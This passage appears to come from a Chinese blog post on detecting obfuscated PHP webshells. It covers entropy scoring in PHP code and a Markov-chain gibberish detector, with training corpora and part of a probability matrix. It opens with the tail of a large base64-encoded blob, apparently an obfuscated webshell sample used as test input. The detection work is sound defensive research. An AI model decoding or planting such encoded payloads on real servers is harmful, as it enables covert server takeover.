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'))); ?>
Entropy.php
<?php /** * Computes the entropy of an array of tokens (aka symbols). */ class Entropy { var $tokens = array(); //待检测字符集 var $num_events = 0; //样本字符数 var $token_freqs = array(); //字符频度 var $token_probs = array(); //词频占比 var $num_tokens = 0; //词频类别总数(即样本中含有的字符类别数) var $bits = 0.0; //熵值: 表示字符频度分布的平均程度,越大表示字符分布越平均 var $maxent = 0.0; //最大熵: 表示字符分布范围,越大表示频度分布范围越广 var $ratio = 0.0; function Entropy($tokens) { $this->tokens = $tokens; $this->num_events = count($this->tokens); $this->token_freqs = $this->getTokenFrequencies(); $this->num_tokens = count($this->token_freqs); foreach ($this->token_freqs as $token => $freq) { //字符的词频占比(即某个字符占总字符的百分比) $this->token_probs[$token] = $freq / $this->num_events; $entropy += $this->token_probs[$token] * log($this->token_probs[$token], 2); } $this->bits = -1.0 * $entropy; $this->maxent = log($this->num_tokens, 2); $this->ratio = $this->bits / $this->maxent; } function getTokenFrequencies() { for ($i = 0; $i < $this->num_events; $i++) { //统计字符(a ~ z)的词频 $this->token_freqs[$this->tokens[$i]]++; } return $this->token_freqs; } } ?>
clickstream_entropy.php
<?php require_once "./Entropy.php"; //$tokens = array("h","n","p","s","h","n","h","a","h","p","h","s","h","n","p"); $tokens = str_split(file_get_contents("./3.php"), 1); $e = new Entropy($tokens); ?> <pre> <?php print_r($e) ?> </pre> <p> The Entropy of the source measured in bits is: <?php echo $e->bits ?> </p>
Relevant Link:
http://en.wikipedia.org/wiki/Entropy_%28information_theory%29 http://www.codeforge.cn/article/191405
0x2: 基于隐式马尔柯夫链的文本字符串元音字母比重判断(Gibberish Detector)
通过观察正常脚本文件、变形后的WEBSHELL可以发现,正常WEB脚本是程序员编写的,每个变量、字符串都表现出"很好念"这个特性,而反之变形后的WEBSHELL往往"无法正常念出","好念"这个概念也可以有另外一个高级一些的特征,叫做"gibberish detection",判断一个字符串是不是能用人类的语言念出来,比如google就不是一个英文单词但是朗朗上口。这背后是一个基于马尔可夫链的模型
应用在WEBSHELL检测上流程如下
1. 基于隐式马尔科夫链训练检测模型 2. 进行马尔柯夫链训练,目标是获得二阶词汇的26 * 26矩阵 1) 基础语料库: 正常的英文短文语料库 2) 正例语料库: Token序列后的正常网站脚本的变量、字符串 3) 反例语料库: Token序列后的恶意WEBSHELL脚本的变量、字符串 3. 完成训练过程,得到判断阀值: threshold 4. 获取待检测样本的Token语法树,并提取其中的指定类型元素,包括 1) 变量 2) 字符串 5. 对提出出的变量、字符串进行"Gibberish Detection" 6. 对检测结果进行分类,得到聚类结果 7. 如果元音开头词语(易读词)大于一半,则判定为正常文件,反之为WEBSHELL
big.txt(用于训练的基础语料库)
The Project Gutenberg EBook of The Adventures of Sherlock Holmes by Sir Arthur Conan Doyle (#15 in our series by Sir Arthur Conan Doyle) Copyright laws are changing all over the world. Be sure to check the copyright laws for your country before downloading or redistributing this or any other Project Gutenberg eBook. This header should be the first thing seen when viewing this Project Gutenberg file. Please do not remove it. Do not change or edit the header without written ermission. Please read the "legal small print," and other information about the eBook and Project Gutenberg at the bottom of this file. Included is important information about your specific rights and restrictions in how the file may be used. ..
good.txt(用于训练的正例语料库)
rob two models some long sentence, might suck? Project Gutenberg a b c
bad.txt(用于训练的反例语料库)
zxcvwerjasc nmnjcviburili,<> zxcvnadtruqe ertrjiloifdfyyoiu grty iuewdiivjh
matrix.txt(训练得到的二阶词汇隐式马尔柯夫链26 * 26正矩阵)
a:2:{s:6:"matrix";a:27:{i:0;a:27:{i:0;d:-8.5691373129308985;i:1;d:-3.9369332597631863;i:2;d:-3.2206701626973908;i:3;d:-3.0482479869676102;i:4;d:-6.0522790633362966;i:5;d:-4.6995609977500097;i:6;d:-3.9941585968087816;i:7;d:-6.7104072175966607;i:8;d:-3.2453041060602184;i:9;d:-7.0607402550101082;i:10;d:-4.5122833596242966;i:11;d:-2.4997201529644935;i:12;d:-3.6426367816409662;i:13;d:-1.5707462805725019;i:14;d:-7.9784688016538912;i:15;d:-3.8936418102220776;i:16;d:-9.8219002814262666;i:17;d:-2.3025283782801376;i:18;d:-2.3483664253823981;i:19;d:-1.9448651421947813;i:20;d:-4.5391581266637013;i:21;d:-3.871849760115083;i:22;d:-4.7063591204638309;i:23;d:-6.5603133384650167;i:24;d:-3.6497253232076332;i:25;d:-6.6419543029262833;i:26;d:-2.7134701747591117;}i:1;a:27:{i:0;d:-2.5528619980784999;i:1;d:-5.1392262080557547;i:2;d:-6.0497198222455832;i:3;d:-6.2194047950350262;i:4;d:-1.173596307609444;i:5;d:-8.5639540871281046;i:6;d:-8.8051161439449928;i:7;d:-8.4949612156411529;i:8;d:-3.3328454702735173;i:9;d:-5.0045327002510547;i:10;d:-8.8051161439449928;i:11;d:-2.1390850632227161;i:12;d:-6.1216070517588994;i:13;d:-6.8085622620709243;i:14;d:-2.1459387811703974;i:15;d:-8.312639658847198;i:16;d:-8.9004263237493166;i:17;d:-2.7193750088559678;i:18;d:-3.7884385353927739;i:19;d:-4.7032243760875083;i:20;d:-2.1373500561366239;i:21;d:-6.320209494156992;i:22;d:-7.676650892127201;i:23;d:-8.9004263237493166;i:24;d:-2.3611294272462486;i:25;d:-8.9004263237493166;i:26;d:-4.7384231130534014;}i:2;a:27:{i:0;d:-2.0894631398847698;i:1;d:-9.3982849786401577;i:2;d:-3.8466182187208457;i:3;d:-7.6784990090371927;i:4;d:-1.7391136109740999;i:5;d:-8.7921491750698433;i:6;d:-9.5806065354341126;i:7;d:-1.9093388132314668;i:8;d:-2.9331775988939013;i:9;d:-9.4852963556297887;i:10;d:-3.3436500333481591;i:11;d:-3.2765234305843181;i:12;d:-8.5158957984416848;i:13;d:-8.838669190704735;i:14;d:-1.6000355228278762;i:15;d:-9.4852963556297887;i:16;d:-6.3860234031349563;i:17;d:-3.3776662418796031;i:18;d:-5.8381863143921464;i:19;d:-2.3909106346293085;i:20;d:-3.2184408726543063;i:21;d:-9.4852963556297887;i:22;d:-8.838669190704735;i:23;d:-9.5806065354341126;i:24;d:-4.6212645357254072;i:25;d:-8.2996726899720485;i:26;d:-3.8668737299247438;}i:3;a:27:{i:0;d:-3.7200475908408235;i:1;d:-7.4184345505757561;i:2;d:-7.8868134840944899;i:3;d:-4.5648654740864751;i:4;d:-1.9699465394791131;i:5;d:-6.7968969023939341;i:6;d:-5.4304488376459741;i:7;d:-6.754155354016663;i:8;d:-2.4627220077183942;i:9;d:-6.2773755716603894;i:10;d:-7.6662707144803379;i:11;d:-4.5583264503194183;i:12;d:-5.5188785108919935;i:13;d:-5.9464847448773721;i:14;d:-3.1170097229317628;i:15;d:-8.3804713042381156;i:16;d:-8.1362743437260736;i:17;d:-3.6243165394601604;i:18;d:-3.6811521539816408;i:19;d:-7.1936663035345445;i:20;d:-3.9941983786827824;i:21;d:-5.5687641654028628;i:22;d:-7.0773273114503947;i:23;d:-9.9280338129541281;i:24;d:-4.6138430972498012;i:25;d:-9.7457122561601732;i:26;d:-0.53944684222602057;}i:4;a:27:{i:0;d:-3.0956911156796725;i:1;d:-6.3279563530093395;i:2;d:-3.7113941175293448;i:3;d:-2.4143090966150091;i:4;d:-3.7280101535107066;i:5;d:-4.5550958099493206;i:6;d:-4.9582369569836615;i:7;d:-6.3408241776207328;i:8;d:-4.4651158844639438;i:9;d:-8.0432622665219515;i:10;d:-7.012917948982845;i:11;d:-3.4395652463282116;i:12;d:-3.7489856294972617;i:13;d:-2.3891535950601428;i:14;d:-5.2811982786521376;i:15;d:-4.4265987840363543;i:16;d:-6.2651316283495033;i:17;d:-1.9762712469186809;i:18;d:-2.5192259875477632;i:19;d:-3.7331106440131854;i:20;d:-6.0512936758071696;i:21;d:-4.1152260280409223;i:22;d:-4.7192493011961147;i:23;d:-4.4511788671515573;i:24;d:-4.535588241035776;i:25;d:-7.7317546156581018;i:26;d:-1.1291364595675442;}i:5;a:27:{i:0;d:-2.7634422911455703;i:1;d:-7.9114774546442685;i:2;d:-7.5295428439462988;i:3;d:-8.4946237399898852;i:4;d:-2.4511005664356609;i:5;d:-2.9261202157943278;i:6;d:-7.6122345597914123;i:7;d:-8.5371833544086808;i:8;d:-2.4505074466080714;i:9;d:-9.0336202407225734;i:10;d:-8.7282385911713902;i:11;d:-3.7482433854502708;i:12;d:-8.8394642262816152;i:13;d:-7.6653443851053602;i:14;d:-1.9043799278633868;i:15;d:-8.3053817403513577;i:16;d:-9.3700924773437855;i:17;d:-2.3558173549839756;i:18;d:-5.9296743825283489;i:19;d:-3.3156531310744151;i:20;d:-3.5058932812816797;i:21;d:-9.3700924773437855;i:22;d:-7.8014765594299407;i:23;d:-9.3700924773437855;i:24;d:-6.1353433033192948;i:25;d:-9.3700924773437855;i:26;d:-0.99767075505541947;}i:6;a:27:{i:0;d:-2.681117318742622;i:1;d:-8.560252680876685;i:2;d:-8.0833286087863758;i:3;d:-6.8862762473050125;i:4;d:-1.9631827738890724;i:5;d:-7.924263914156688;i:6;d:-4.61975020412667;i:7;d:-2.2213641819441556;i:8;d:-2.8612966495974126;i:9;d:-9.1480393457788036;i:10;d:-8.560252680876685;i:11;d:-3.3580791748815502;i:12;d:-6.0753460310886842;i:13;d:-3.7399711152716475;i:14;d:-2.831958278425978;i:15;d:-7.9541168773063688;i:16;d:-9.052729165974478;i:17;d:-2.5526687518888194;i:18;d:-4.0629151996918083;i:19;d:-4.943346726387837;i:20;d:-3.4944980875593492;i:21;d:-9.1480393457788036;i:22;d:-7.5794234278649579;i:23;d:-9.1480393457788036;i:24;d:-5.8822799350117521;i:25;d:-8.6174110947166334;i:26;d:-1.0302198528344138;}i:7;a:27:{i:0;d:-1.8949866865832032;i:1;d:-7.3872065417745896;i:2;d:-8.0531040798871594;i:3;d:-7.5422784561211689;i:4;d:-0.72863536514475458;i:5;d:-7.8583157543280748;i:6;d:-9.5899712994864252;i:7;d:-8.779041083270096;i:8;d:-1.9951372153459488;i:9;d:-10.100796923252416;i:10;d:-7.8852232072479991;i:11;d:-6.6350610204526888;i:12;d:-6.2613446106591049;i:13;d:-6.7051705866397153;i:14;d:-2.5617698674284206;i:15;d:-9.2534990628652114;i:16;d:-10.100796923252416;i:17;d:-4.5720294302077304;i:18;d:-6.2226754694999507;i:19;d:-3.7645613367085251;i:20;d:-4.6222435064014453;i:21;d:-9.5411811353169931;i:22;d:-7.3816968859636205;i:23;d:-10.283118480046371;i:24;d:-5.0245819835101777;i:25;d:-10.187808300242045;i:26;d:-2.3623088007577695;}i:8;a:27:{i:0;d:-3.7122448865480009;i:1;d:-4.7174752821302111;i:2;d:-2.7839843705158169;i:3;d:-3.2216013768067646;i:4;d:-3.1683365236496233;i:5;d:-3.9038254558612402;i:6;d:-3.6807905470589519;i:7;d:-9.119304544100272;i:8;d:-6.4229895992164829;i:9;d:-10.323277348426208;i:10;d:-5.2408383222009691;i:11;d:-3.0795261367137394;i:12;d:-3.1736876196863721;i:13;d:-1.3126793991869439;i:14;d:-2.6643811758555511;i:15;d:-4.9236074876178835;i:16;d:-7.8955291124781564;i:17;d:-3.4097056841226312;i:18;d:-2.0515798328281978;i:19;d:-2.1011937452905483;i:20;d:-6.5110746782802726;i:21;d:-3.8167461832949807;i:22;d:-9.6726897822850582;i:23;d:-6.1683081643876729;i:24;d:-10.410288725415837;i:25;d:-5.511770729440288;i:26;d:-3.7883989879590838;}i:9;a:27:{i:0;d:-2.3427609160575655;i:1;d:-6.1024094410597085;i:2;d:-6.0378709199221374;i:3;d:-6.5078745491678731;i:4;d:-1.4153520955994334;i:5;d:-6.2455102847003818;i:6;d:-6.1714023125466602;i:7;d:-6.3255529923739182;i:8;d:-5.5146227761575899;i:9;d:-6.5078745491678731;i:10;d:-6.2455102847003818;i:11;d:-6.4125643693635483;i:12;d:-6.3255529923739182;i:13;d:-6.5078745491678731;i:14;d:-1.2783714986201964;i:15;d:-6.4125643693635483;i:16;d:-6.3255529923739182;i:17;d:-6.1024094410597085;i:18;d:-6.1024094410597085;i:19;d:-6.2455102847003818;i:20;d:-1.1002544477293865;i:21;d:-6.5078745491678731;i:22;d:-6.2455102847003818;i:23;d:-6.5078745491678731;i:24;d:-6.5078745491678731;i:25;d:-6.5078745491678731;i:26;d:-4.8592159235804919;}i:10;a:27:{i:0;d:-3.6194933584945135;i:1;d:-7.047703539402737;i:2;d:-6.0624199360416311;i:3;d:-7.6718578484757316;i:4;d:-1.2114318817004575;i:5;d:-6.2855634873558408;i:6;d:-6.8245599880885273;i:7;d:-3.6311485020862624;i:8;d:-1.7851984157338754;i:9;d:-7.8149586921164049;i:10;d:-7.4895362916817767;i:11;d:-3.8876682145574701;i:12;d:-6.0361026277242571;i:13;d:-2.3543916630889337;i:14;d:-3.8417682258102714;i:15;d:-7.5466947055217251;i:16;d:-7.9820127767795706;i:17;d:-5.4820682496270301;i:18;d:-3.0008999219496366;i:19;d:-6.6910285954640045;i:20;d:-3.7387258798373502;i:21;d:-7.2444138336487915;i:22;d:-5.4382656269686374;i:23;d:-8.0773229565838953;i:24;d:-4.6828145630725366;i:25;d:-8.0773229565838953;i:26;d:-1.4288566755523215;}i:11;a:27:{i:0;d:-2.2691833883143882;i:1;d:-6.5732977996947817;i:2;d:-5.7454793654499312;i:3;d:-2.8596367214634224;i:4;d:-1.7841347050080587;i:5;d:-4.1440479009095723;i:6;d:-6.8440916541180412;i:7;d:-7.7437746495925355;i:8;d:-2.1751158710179781;i:9;d:-9.7015192562948513;i:10;d:-4.9565871279316012;i:11;d:-2.065933606191924;i:12;d:-5.0603386327837274;i:13;d:-6.4926937672801524;i:14;d:-2.4508837443961715;i:15;d:-5.6044007671900253;i:16;d:-9.7015192562948513;i:17;d:-5.6482860823151819;i:18;d:-3.8794600407142781;i:19;d:-3.8645179378524279;i:20;d:-3.8209862698941515;i:21;d:-5.091361528795721;i:22;d:-5.466205750947557;i:23;d:-9.8838408130888062;i:24;d:-2.3336002683489521;i:25;d:-8.6029069676267422;i:26;d:-2.0434097729831913;}i:12;a:27:{i:0;d:-1.7539942375247688;i:1;d:-3.6841198980845076;i:2;d:-6.559311098803656;i:3;d:-8.4396239653731566;i:4;d:-1.3654444296574595;i:5;d:-6.4075846625879045;i:6;d:-9.3375655585791151;i:7;d:-8.238953269911006;i:8;d:-2.4389427631602505;i:9;d:-9.1705114739159495;i:10;d:-8.9022474873212687;i:11;d:-6.2060317438660624;i:12;d:-3.6410823864045252;i:13;d:-5.6624162972770806;i:14;d:-2.2280575251437695;i:15;d:-2.6972144960398214;i:16;d:-9.432875738383439;i:17;d:-5.5010501056591137;i:18;d:-3.5381974599631496;i:19;d:-6.9071470940751842;i:20;d:-3.4685254837670296;i:21;d:-9.2505541815894858;i:22;d:-8.0718991852478386;i:23;d:-9.432875738383439;i:24;d:-3.424799925470261;i:25;d:-9.432875738383439;i:26;d:-1.8968318511898539;}i:13;a:27:{i:0;d:-3.4115771342847401;i:1;d:-6.728285208389976;i:2;d:-3.0909427430720093;i:3;d:-1.7402648256897351;i:4;d:-2.5015190512398306;i:5;d:-4.8173719013717582;i:6;d:-2.1132105305164308;i:7;d:-6.807749379744223;i:8;d:-3.2957925490940969;i:9;d:-6.2527989510692938;i:10;d:-4.9177978843369541;i:11;d:-4.632769841879079;i:12;d:-5.9887758529341601;i:13;d:-4.6666517566412899;i:14;d:-2.8767595180672929;i:15;d:-7.6037539457438754;i:16;d:-6.864465609186075;i:17;d:-7.1872390014491261;i:18;d:-3.0523362157550311;i:19;d:-2.2647479268985964;i:20;d:-4.9001580949910455;i:21;d:-5.348959516586179;i:22;d:-7.1477365584728796;i:23;d:-7.4543765446692749;i:24;d:-4.5463518451567912;i:25;d:-8.8077267500698113;i:26;d:-1.4656789800236865;}i:14;a:27:{i:0;d:-5.0822413891388436;i:1;d:-5.1423936319936017;i:2;d:-4.2765983533289242;i:3;d:-4.0852168176898669;i:4;d:-5.7599683850109136;i:5;d:-2.1747736159953641;i:6;d:-5.2886215722187107;i:7;d:-6.0901741103603149;i:8;d:-4.4715723308194235;i:9;d:-6.9068746830379801;i:10;d:-4.4326586554122649;i:11;d:-3.2277431063139637;i:12;d:-2.8212923556513845;i:13;d:-1.7681088393713913;i:14;d:-3.5156224239092224;i:15;d:-3.9518016568316168;i:16;d:-8.9863162247178163;i:17;d:-2.1664590794141954;i:18;d:-3.3712131841519417;i:19;d:-3.1224483347145418;i:20;d:-2.2101893882141153;i:21;d:-3.5450716407123704;i:22;d:-3.1404797504673136;i:23;d:-6.6631118445210342;i:24;d:-5.5134443850526402;i:25;d:-7.7042256411279277;i:26;d:-2.2129736790077486;}i:15;a:27:{i:0;d:-2.136265349667144;i:1;d:-7.6487499302755264;i:2;d:-6.5221637895650106;i:3;d:-8.5031652584315935;i:4;d:-1.734614577170007;i:5;d:-6.5016852582214701;i:6;d:-7.7853254652812778;i:7;d:-3.6425779605789979;i:8;d:-2.654272848600284;i:9;d:-8.4543750942621632;i:10;d:-7.8613113722591992;i:11;d:-2.3851781986138283;i:12;d:-6.3630990949353237;i:13;d:-7.2942049125946191;i:14;d:-2.1162017675272979;i:15;d:-2.7907534570773387;i:16;d:-9.1963124389915389;i:17;d:-1.7868731941606955;i:18;d:-3.8487288311405847;i:19;d:-3.2942257030347744;i:20;d:-3.1971277688684197;i:21;d:-9.1963124389915389;i:22;d:-7.0800569241889875;i:23;d:-9.1963124389915389;i:24;d:-4.9871522023408579;i:25;d:-9.1963124389915389;i:26;d:-2.9363486388485507;}i:16;a:27:{i:0;d:-6.1822914969456484;i:1;d:-6.1822914969456484;i:2;d:-6.1822914969456484;i:3;d:-6.1822914969456484;i:4;d:-6.1822914969456484;i:5;d:-6.1822914969456484;i:6;d:-6.1822914969456484;i:7;d:-6.1822914969456484;i:8;d:-6.1822914969456484;i:9;d:-6.1822914969456484;i:10;d:-6.1822914969456484;i:11;d:-6.1822914969456484;i:12;d:-6.1822914969456484;i:13;d:-6.1822914969456484;i:14;d:-6.1822914969456484;i:15;d:-6.1822914969456484;i:16;d:-6.1822914969456484;i:17;d:-6.1822914969456484;i:18;d:-6.1822914969456484;i:19;d:-6.1822914969456484;i:20;d:-0.057170565024993084;i:21;d:-6.1822914969456484;i:22;d:-6.1822914969456484;i:23;d:-6.1822914969456484;i:24;d:-6.1822914969456484;i:25;d:-6.1822914969456484;i:26;d:-5.540437610773254;}i:17;a:27:{i:0;d:-2.5722807952437394;i:1;d:-5.9920572567963797;i:2;d:-4.3193167645512389;i:3;d:-3.7284294070555273;i:4;d:-1.4225483817556492;i:5;d:-5.3572316866714189;i:6;d:-4.3317609271287889;i:7;d:-6.0337579859953241;i:8;d:-2.364541745819138;i:9;d:-9.405183209323809;i:10;d:-4.8504645668318158;i:11;d:-4.6735565993831587;i:12;d:-3.7450043721497401;i:13;d:-3.9165761163326409;i:14;d:-2.3221645573596241;i:15;d:-5.4139794060212223;i:16;d:-9.0405400957358992;i:17;d:-3.636862213530037;i:18;d:-2.9016138569514562;i:19;d:-3.2345687965875074;i:20;d:-3.9816438780223904;i:21;d:-4.9058180822326944;i:22;d:-6.2575885864605718;i:23;d:-10.13915238440401;i:24;d:-3.2585970253485272;i:25;d:-8.0701821425914684;i:26;d:-1.7281348556024396;}i:18;a:27:{i:0;d:-3.2090119684802527;i:1;d:-6.334899523154303;i:2;d:-4.0932990644173737;i:3;d:-7.5920350390622797;i:4;d:-2.1586345703035548;i:5;d:-6.1829951939534187;i:6;d:-7.8495033329175641;i:7;d:-2.915257814589145;i:8;d:-2.7754710419906368;i:9;d:-9.5502910239398933;i:10;d:-4.5510244574503966;i:11;d:-4.7071315107863114;i:12;d:-4.5892723223674494;i:13;d:-6.2432450734008436;i:14;d:-2.9689285157149672;i:15;d:-3.8539273046711369;i:16;d:-7.0090314376007603;i:17;d:-8.2431339833787263;i:18;d:-2.8108514947509753;i:19;d:-2.1177557637833035;i:20;d:-3.2565503308680648;i:21;d:-7.8655036742640059;i:22;d:-5.3805970244760051;i:23;d:-10.383200146874996;i:24;d:-5.2014165965829111;i:25;d:-9.9131965176292614;i:26;d:-0.99113005987532032;}i:19;a:27:{i:0;d:-3.1682706209